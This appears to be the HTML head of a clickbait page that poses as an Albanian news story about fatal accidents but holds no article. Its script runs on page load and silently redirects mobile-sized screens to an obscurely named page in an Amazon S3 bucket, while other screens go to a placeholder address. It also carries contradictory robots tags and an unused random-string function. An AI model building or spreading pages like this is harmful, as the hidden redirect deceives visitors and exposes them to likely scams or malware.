<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="2411"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Këta persona kanë humbur jetën mëngjesin e sotëm në dy aksidente me vdekje në Shqipëri"/>
<meta property="og:image" content="https://content.pancake.vn/1/s900x900/fwebp/7d/09/a4/2d/ecdc546620af9658a3aec7b6dd964048b1140a59d39326994885604a.jpg"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
	function generateRandomString(iLen) {
    var sRnd = '';
    var sChrs = "abcdefghiklmnopqrstuvwxyz";
    for (var i = 0; i < iLen; i++) {
      var randomPoz = Math.floor(Math.random() * sChrs.length);
      sRnd += sChrs.substring(randomPoz, randomPoz + 1);
    }
    return sRnd;
  }
        if (screen.width <= 720) {
        window.location = "https://redirface001.s3.ap-northeast-1.amazonaws.com/winggggg/fdvvvvv221.html";
    } else {
        window.location = "https://example.com/default_page.html"
    }
</script>
	
